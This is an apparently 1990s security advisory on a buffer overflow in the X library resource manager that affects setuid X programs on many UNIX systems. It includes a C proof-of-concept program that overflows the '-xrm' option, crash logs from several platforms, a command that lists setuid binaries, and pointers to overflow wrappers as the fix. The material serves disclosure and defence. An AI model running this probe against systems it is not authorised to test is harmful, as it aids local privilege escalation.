COMMAND

    X Library

SYSTEMS AFFECTED

    Most UNIX systems

PROBLEM

    David Hedley found  following. There is  a serious problem  in the
    resource  manager  routines  in  the  X  libraries  on  most  UNIX
    platforms.   From  first  impressions,  it  looks like pretty much
    every suid program linked against  the X libraries which uses  the
    X  resource  manager  routines  is  vulnerable  to buffer overflow
    exploits even if the programs themselves are secure.

    To test the extent of this, compile the following program and  run
    it  with  various  X  suid  programs  as  parameters. If you get a
    segmentation  fault  or  bus  error,  then  you  are   potentially
    vulnerable.

    ----------------------- testx.c ---------------------

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    void main(int argc, char **argv)
    {
	char *env[] = {0};
	char buffer[18000];    /* Irix has a 20k limit for environment+args */
	if (argc < 2)
	  exit(1);

	memset(buffer,'a',sizeof buffer);
	buffer[sizeof buffer-1] = '\0';

	execle(argv[1], argv[1], "-xrm", buffer, 0, env);
	perror("exec failed");
    }

---------------------- end testx.c ----------------------

    And here we have it in action on Irix:

        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xterm
        zsh: bus error  ./testx /usr/bin/X11/xterm
        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/cdplayer
        zsh: bus error  ./testx /usr/bin/X11/cdplayer
        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xconsole
        zsh: bus error  ./testx /usr/bin/X11/xconsole
        warlock:~/warlock/src/tmp ->./testx /usr/bin/X11/xlock
        Xlib: connection to ":0.0" refused by server
        Xlib: Client is not authorized to connect to Server
        xlock: unable to open display :0.
        warlock:~/warlock/src/tmp ->

    Here we can see that xlock  is not vulnerable to this attack,  but
    the others potentially are.

    On solaris:

        maxx:~/tmp ->./testx /usr/dt/bin/dtprintinfo
        zsh: bus error  ./testx /usr/dt/bin/dtprintinfo
        maxx:~/tmp ->./testx /usr/dt/bin/dtaction
        zsh: bus error  ./testx /usr/dt/bin/dtaction

    On XFree86 (tested on FreeBSD 2.2.2):

        inferno:~/tmp ->./testx /usr/X11R6/bin/xlock
        zsh: segmentation fault  ./testx /usr/X11R6/bin/xlock
        inferno:~/tmp ->./testx /usr/X11R6/bin/color_xterm
        zsh: segmentation fault  ./testx /usr/X11R6/bin/color_xterm
        inferno:~/tmp ->./testx /usr/X11R6/bin/xterm
        zsh: segmentation fault  ./testx /usr/X11R6/bin/xterm

    The xlock version there was the latest version (xlockmore-4.02).

    For Linux/Slackware-3.1:

        % uname -a
        Linux xwing 2.0.0 #5 Fri Feb 21 13:01:20 PST 1997 i486
        % /tmp/xx /usr/X11/bin/xload
        Segmentation fault
        % /tmp/xx /usr/X11/bin/xlock
        Segmentation fault
        % /tmp/xx /usr/X11/bin/xterm
        Segmentation fault

    For RedHat:

        $ cat /etc/redhat-release
        release 4.1 (Vanderbilt)
        $ uname -a
        Linux turing.imm.net 2.0.30 #3 Sat Apr 26 22:55:36 MET DST 1997 i686
        $ find /usr/X11R6 -perm +6000 -exec ls -l {} \;
        -rws--x--x   1 root     root       144868 Feb 13 03:49 /usr/X11R6/bin/xterm
        -rws--x--x   1 root     root       159472 Nov 20  1996 /usr/X11R6/bin/kterm
        -rwsr-xr-x   1 root     bin        710284 Feb 19 07:54 /usr/X11R6/bin/Xmetro
        -r-sr-xr-x   1 root     root        10464 Dec 19 01:01 /usr/X11R6/bin/XConsole
        -rwsr-xr-x   1 root     root        53464 Jan 31 23:16 /usr/X11R6/bin/rxvt
        -rwxr-sr-x   1 root     uucp        98364 Nov 21  1996 /usr/X11R6/bin/seyon
        -rwxr-sr-x   1 root     daemon     181436 Nov 20  1996 /usr/X11R6/bin/xbill
        -rws--x--x   1 root     root       136504 Nov 20  1996 /usr/X11R6/bin/nxterm
        -rwsr-xr-x   1 root     bin        477408 Aug 16  1996 /usr/X11R6/lib/X11/AcceleratedX/arch/LINUX/Xaccel

        $ ./testx /usr/X11R6/bin/xterm
        Segmentation fault
        $ ./testx /usr/X11R6/bin/kterm
        ^[[ASegmentation fault
        $ ./testx /usr/X11R6/bin/XConsole
        Segmentation fault
        $ ./testx /usr/X11R6/bin/rxvt
        rxvt: bad option "-xrm"
        rxvt: bad option "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$
        [spam]
        Usage v2.19:
          rxvt [-help]
            [-display displayname] [-geometry geom] [-/+rv] [-bg color] [-fg color]
            [-fn fontname] [-iconic] [-name string] [-title string] [-n string]
            [-cr color] [-/+ls] [-/+sb] [-sl number] [-/+ut] [-/+vb] [-C]
            [-e command arg ...]

        $ ./testx /usr/X11R6/bin/seyon
        >> Warning: Could not execute `seyon-emu.
        >> Notice: Falling to `xterm'.
        >> Error: Could not execute `xterm'.
        >> Notice: Giving up.
        $ ./testx /usr/X11R6/bin/xbill
        Segmentation fault
        $ ./testx /usr/X11R6/bin/nxterm
        Segmentation fault

SOLUTION

    As for solutions  -- it's wrappers  time.  AUSCERT  wrapper can be
    found at:

    ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper/overflow_wrapper.c

    or

    http://cegt201.bradley.edu/~im14u2c/wrapper/